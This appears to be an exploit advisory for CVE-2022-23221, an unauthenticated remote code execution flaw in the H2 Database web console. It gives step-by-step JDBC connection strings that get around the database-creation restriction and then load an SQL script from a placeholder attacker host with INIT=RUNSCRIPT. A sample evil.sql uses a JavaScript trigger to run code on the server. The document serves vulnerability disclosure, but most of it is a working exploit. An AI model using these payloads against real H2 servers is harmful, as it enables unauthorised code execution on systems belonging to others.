H2 Database Console Remote Code Execution

`Document Title  
===============  
Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221.  
  
Product Description  
===============  
The H2 Console Application  
  
The Console lets you access a SQL database using a browser interface.  
  
Homepage: http://www.h2database.com/html/quickstart.html  
Affected Components  
===============  
File Name: WebServer.java  
File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java  
Impacted Function: getConnection  
  
PoC  
===============  
  
1) Navigate to the console and attempt to connect to a H2 in memory  
database that does not exist using the following JDBC URL:  
  
```  
jdbc:h2:mem:1337;  
```  
  
2) Note that you get the following security exception preventing you  
from creating a new in memory database:  
  
```  
Database "mem:1337" not found, either pre-create it or allow remote  
database creation (not recommended in secure environments) [90149-209]  
90149/90149 (Help)  
```  
  
3) Now try again with the following JDBC URL:  
  
```  
jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\  
```  
  
4) Note that you were able to successfully create a new in memory database  
5) Create a SQL file that contains a trigger that executes  
java/javascript/ruby code when executed and host it on a domain you  
control (ex: http://attacker)  
6) Use the following JDBC URL to execute the SQL file hosted on your  
domain on connect:  
  
```  
jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT  
FROM 'http://attacker/evil.sql';'\  
```  
  
Example evil.sql file:  
  
```  
CREATE TABLE test (  
id INT NOT NULL  
);  
  
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript  
var fos = Java.type("java.io.FileOutputStream");  
var b = new fos ("/tmp/pwnedlolol");';  
  
INSERT INTO TEST VALUES (1);  
```  
  
CVE Issued: CVE-2022-23221  
  
  
`